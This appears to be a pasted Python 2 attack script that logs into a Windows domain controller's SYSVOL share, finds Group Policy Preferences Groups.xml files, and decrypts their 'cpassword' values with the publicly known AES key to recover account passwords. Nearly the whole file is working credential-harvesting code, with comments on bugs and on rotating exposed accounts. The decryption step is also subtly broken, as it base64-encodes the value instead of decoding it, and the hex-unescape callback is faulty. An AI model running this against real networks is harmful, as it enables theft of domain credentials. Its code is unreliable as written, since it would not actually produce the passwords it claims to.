winfang

gp_password

  1. #!/usr/bin/python
  2.  
  3. """
  4. This script allows you to pull a password that is set by Group Policy out of the policy
  5. and decrypt it.  This is based on the following blog post found by Ryan Elkins.
  6.  
  7. http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
  8.  
  9. You need to have the following Python Packages installed that are not normally included.
  10. smbclient - http://pypi.python.org/pypi/PySmbClient/0.1.1
  11. Crypto - https://www.dlitz.net/software/pycrypto/ (This is already installed on Back|Track)
  12.  
  13. Proper usage: python ./gp_password.py <Server> <Username> <Password> <Domain>
  14.  
  15. Josh Kelley - 06/19/2012 @winfang98
  16. """
  17.  
  18. import smbclient, sys, base64, binascii, re
  19. from Crypto.Cipher import AES
  20.  
def asciirepl(match):
    """Return the raw bytes encoded by the hex digits in *match*.

    The whole matched text (``match.group()``) is handed to
    ``binascii.unhexlify``; it is the caller's pattern that decides what
    that text contains. Intended as the replacement callback of ``re.sub``.
    """
    return binascii.unhexlify(match.group())
  25.  
def reformat_content(data):
    """Replace every ``\\xNN`` escape sequence in *data*.

    Each occurrence of a literal backslash, ``x`` and two word characters is
    passed to ``asciirepl``, whose return value is substituted in place.
    """
    return re.sub(r'\\x(\w{2})', asciirepl, data)
  29.  
# --- command-line handling ----------------------------------------------------
# Exactly four positional arguments are expected (script name + 4 == 5).
if len(sys.argv) != 5:
    print "Proper usage: python ./gp_password.py <Server> <Username> <Password> <Domain>"
    exit()

# NOTE: the account password is taken from argv, so it is visible in the
# process list and shell history of the host this is run from.
server = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
domain = sys.argv[4]    # Not needed if logging onto the domain controller

# Authenticated SMB session against the SYSVOL share of the given server.
smb = smbclient.SambaClient(server=server, share="SYSVOL", username=username, password=password, domain=domain)

# Fixed AES key used to protect Group Policy Preferences "cpassword" values.
# The key is the same for every domain and is publicly documented, which is
# why a cpassword in a readable SYSVOL file is equivalent to plaintext.
# Defensive takeaway: treat any Groups.xml containing cpassword= as an exposed
# credential; remove the preference and rotate that account's password.
# str.decode('hex') is Python 2 only (this whole file is Python 2 syntax).
key = """4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b
""".replace(" ","").replace("\n","").decode('hex')

print "[-] Looking for Groups.xml file"

# The first directory listing doubles as the login check. The bare except
# catches every exception (including KeyboardInterrupt), so the printed
# message can be misleading about the real cause.
try:
    first_dir = smb.listdir("/")
except:
    print "[!] Cannont login to the server"
    exit()

# Assumes the first entry under SYSVOL is the domain directory; an empty
# listing raises IndexError on this line.
path = "/" + first_dir[0] + "/Policies/"

# Walk every policy directory looking for a machine-side Groups.xml.
for policy in smb.listdir(path):
    subpolicy = path + policy + "/MACHINE/Preferences/Groups/"
    try:
        for contents in smb.listdir(subpolicy):
            if contents == "Groups.xml":
                file_name = subpolicy + contents
                print "[-] Found Policy:", file_name
                # The remote file handle is never closed.
                f = smb.open(file_name)
                data = f.read()
                # Crude XML handling: split on spaces and look for a token
                # that starts with the cpassword attribute. This only works
                # when the attribute value itself contains no spaces.
                s = data.split(" ")
                for a in s:
                    if a[:10] == "cpassword=":
                        p = a.split("=")
                        # Surrounding quotes stripped, one '=' of padding added.
                        cpassword = p[1].strip('"') + "="
                        # Mode 2 is AES.MODE_CBC in PyCrypto. No IV is passed,
                        # so PyCrypto's default (presumably all zero bytes) is
                        # used; the decrypted bytes are then hex-unescaped.
                        o = AES.new(key, 2).decrypt(base64.b64encode(cpassword))
                        ascii_string = reformat_content(o)
                        print "[-] Password:", ascii_string
    except:
        # Bare except: policies without a Groups/ directory end up here, but
        # so does every other error (unexpected XML, decrypt failure), silently.
        pass